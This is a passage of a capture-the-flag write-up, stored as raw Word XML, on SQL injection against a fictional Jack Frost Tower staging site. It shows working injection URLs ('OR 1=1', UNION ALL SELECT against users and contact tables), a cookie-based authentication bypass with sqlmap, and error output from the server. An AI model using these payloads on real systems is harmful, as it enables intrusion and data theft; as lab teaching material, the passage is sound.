        <w:t xml:space="preserve"> documentation notes, “</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Caution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The string provided to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql.raw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>() will skip all escaping functions when used, so be careful when passing in unvalidated input.” So even though the developers submit the raw request within an escape function, it is discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A4EAE" w14:textId="73E8A861" w:rsidR="00AC7DA4" w:rsidRDefault="00AC7DA4" w:rsidP="00AC7DA4">
      <w:r>
        <w:t>In effect, the query built becomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F908800" w14:textId="2CA6EEAA" w:rsidR="00AC7DA4" w:rsidRDefault="00480D92" w:rsidP="008D2A0E">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00480D92">
        <w:t xml:space="preserve">SELECT * FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00480D92">
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00480D92">
        <w:t xml:space="preserve"> WHERE id=[</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ATTACKER CONTROLLED</w:t>
      </w:r>
      <w:r w:rsidRPr="00480D92">
        <w:t>] or id=?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28609942" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00AC7DA4"/>
    <w:p w14:paraId="7D193B4E" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00480D92" w:rsidP="00AC7DA4">
      <w:r>
        <w:t>From the details page, a command like this (injecting an “</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>[id] OR 1=1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” to make the WHERE clause true) will dump all users in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EC46E" w14:textId="1CE44AE0" w:rsidR="00480D92" w:rsidRPr="00342C83" w:rsidRDefault="00480D92" w:rsidP="00D6316D">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://staging.jackfrosttower.com/detail/600,601,602%20OR%201%3D1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107E0BB" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00AC7DA4"/>
    <w:p w14:paraId="31CD671F" w14:textId="48C38D13" w:rsidR="00480D92" w:rsidRDefault="00480D92" w:rsidP="00AC7DA4">
      <w:r>
        <w:t xml:space="preserve">However, looking at the code and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>encontact_db.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file, there are references to the users table and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table. There is no apparent reference to descriptions or data that would match up with expectations of Jack’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list, so the goal may be to access a user that can pivot to some other data, perhaps offsite? However, from the way the query is built, it is not possible to change the fact the command is a select command against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table. I discovered you can include “</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeIndentedChar"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>” to insert a comment and disregard the final, escaped ID value. However, ending the first query with a semi-colon and attempting to run commands against other tables seems to fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBD3AB" w14:textId="04A7E119" w:rsidR="00480D92" w:rsidRDefault="00480D92" w:rsidP="00AC7DA4">
      <w:r>
        <w:t xml:space="preserve">A little stuck, I began attempting to scan the details endpoint with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D2A0E">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00342C83">
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00342C83" w:rsidRPr="00BB1C6B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/sqlmapproject/sqlmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00342C83">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>to help me figure out how to pivot to accessing or modifying data in the users table.</w:t>
      </w:r>
      <w:r w:rsidR="00A5549E">
        <w:t xml:space="preserve"> By using the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5549E" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>connect.sid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5549E">
        <w:t xml:space="preserve">” value from the site cookie for a session that has </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5549E">
        <w:t>uniqueID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5549E">
        <w:t xml:space="preserve"> set, we can extend the authentication bypass to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A5549E" w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A5549E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F3E93" w14:textId="0CA6031E" w:rsidR="00A5549E" w:rsidRDefault="00A5549E" w:rsidP="00AC7DA4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The tool was able to validate that the page was vulnerable to injection and was able to detect the database in use; however, it failed to successfully execute a successful union attack to retrieve new data. It also failed to find much else about the database. The tool was able to automatically test for table names against a wordlist, which did find the tables in the code we already knew about: email and users. However, the code provided for the database is not live server code. It is possible that other tables or data were configured after initialization, which may contain data like a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> list with custom fields that describe what Jack will do. I considered using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>CeWL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to create another wordlist, but first started with simple words like “Jack,” “Santa,” and “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” and discovered there was a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D23EBC" w14:textId="17F5F702" w:rsidR="00A5549E" w:rsidRDefault="00A5549E" w:rsidP="00AC7DA4">
      <w:r>
        <w:t xml:space="preserve">Using the same auto-guessing that allowed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to at least test for the existence of tables, column names can be attempted against a known table to retrieve limited information.</w:t>
      </w:r>
      <w:r w:rsidR="00933E9C">
        <w:t xml:space="preserve"> Checking against </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00933E9C">
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00933E9C">
        <w:t>, I received the following output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E526AEC" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7ADCBB85" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0112CAB7" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>[5 columns]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F78973" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>+---------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B60D8BE" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| Column  | Type        |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67DFC5" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>+---------+-------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05004DE1" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| country | non-numeric |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B864E3" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| email   | non-numeric |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7803427C" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| id      | numeric     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A9026" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| note    | non-numeric |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0618DA73" w14:textId="77777777" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>| phone   | numeric     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546B1D20" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00933E9C"/>
    <w:p w14:paraId="707C6A94" w14:textId="76451CB4" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00933E9C">
      <w:r>
        <w:t xml:space="preserve">This confirmed for me that the data I was looking for was likely in the note column of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table, but I still needed a reliable way to access content from other tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78726030" w14:textId="2E3CB522" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00933E9C">
      <w:r>
        <w:t xml:space="preserve">After reading up on SQL injection techniques, it seemed the goal would be to perform </w:t>
      </w:r>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>a UNION ALL SELECT *FROM [table]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to add everything from the table to the existing details output for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD991D" w14:textId="71BC9094" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00933E9C">
      <w:r>
        <w:t xml:space="preserve">Since the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo.notes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> field was in close reach, I thought the users table would be unnecessary and I could skip a step and immediately access that table. A query like this fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A037978" w14:textId="6C3A923B" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r w:rsidRPr="00933E9C">
        <w:t>https://staging.jackfrosttower.com/detail/600,666%20UNION%20ALL%20SELECT%20</w:t>
      </w:r>
      <w:r>
        <w:t>notes</w:t>
      </w:r>
      <w:r w:rsidRPr="00933E9C">
        <w:t>%20FROM%20</w:t>
      </w:r>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:r w:rsidRPr="00933E9C">
        <w:t>,602</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F4B51" w14:textId="77777777" w:rsidR="00D6316D" w:rsidRDefault="00D6316D" w:rsidP="00933E9C"/>
    <w:p w14:paraId="4C3B3892" w14:textId="2C4938A8" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00933E9C">
      <w:r>
        <w:t xml:space="preserve">Initially, I believed there was something fundamentally wrong with the UNION, that it was somehow being blocked or filtered. However, after looking at the escape functions and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysqljs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> documentation, I couldn’t see that there was any mechanism in place in the code to prevent that or reject it specifically when other injections were working. As I started doing testing with a local </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> database and reading more about how UNION selects work, I realized that I couldn’t call a single column like that because the number of columns on each side of the join must be equal. By that note, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> may not be possible to join easily because the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>todo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table seems shorter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839E41D" w14:textId="34FB6A85" w:rsidR="00933E9C" w:rsidRDefault="00933E9C" w:rsidP="00933E9C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To validate that UNION worked, I attempted to UNION the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table with itself, which was successful: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E13C960" w14:textId="2D24486F" w:rsidR="00480D92" w:rsidRDefault="000C2525" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00A612B6" w:rsidRPr="00600680">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://staging.jackfrosttower.com/detail/600,666%20UNION%20ALL%20SELECT%20*%20FROM%20uniquecontact--,602</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="435D74A9" w14:textId="77777777" w:rsidR="00342C83" w:rsidRDefault="00342C83" w:rsidP="00AC7DA4"/>
    <w:p w14:paraId="47209914" w14:textId="6B0BEBAE" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00AC7DA4">
      <w:r>
        <w:t xml:space="preserve">According to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00342C83">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>encontact_db.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file, the users and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uniquecontact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tables should be similar sizes. Running a union fails, but gives us valuable information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54FE00" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>https://staging.jackfrosttower.com/detail/666%20UNION%20ALL%20SELECT%20*%20FROM%20users--,602</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A1193F" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TypeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: /app/webpage/detail.ejs:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F525828" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    27|                             -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CE14E" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    28|                         &lt;% }else { %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2C40F4" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> &gt;&gt; 29|                             &lt;%= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dateFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>encontact.date_update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mmmm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yyyy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> h:MM:ss") %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC4C5C2" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    30|                         &lt;% } %&gt;                     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE3535B" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    31|                         &lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501A686" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    32|                     &lt;/ul&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5E1BB4" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="545984A2" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t>Invalid date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09421631" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Object.dateFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dateformat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/dateformat.js:39:17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A1963" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at eval (eval at compile (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/ejs.js:618:12), &lt;anonymous&gt;:45:26)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668CBEA8" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Array.forEach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (&lt;anonymous&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407B2F1D" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at eval (eval at compile (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/ejs.js:618:12), &lt;anonymous&gt;:21:18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CB3D95" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>returnedFn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/ejs.js:653:17)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20065300" w14:textId="77777777" w:rsidR="00A612B6" w:rsidRDefault="00A612B6" w:rsidP="00342C83">
      <w:pPr>
        <w:pStyle w:val="CodeIndented"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tryHandleCache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (/app/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ejs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/ejs.js:251:36)</w:t>
      </w:r>
    </w:p>
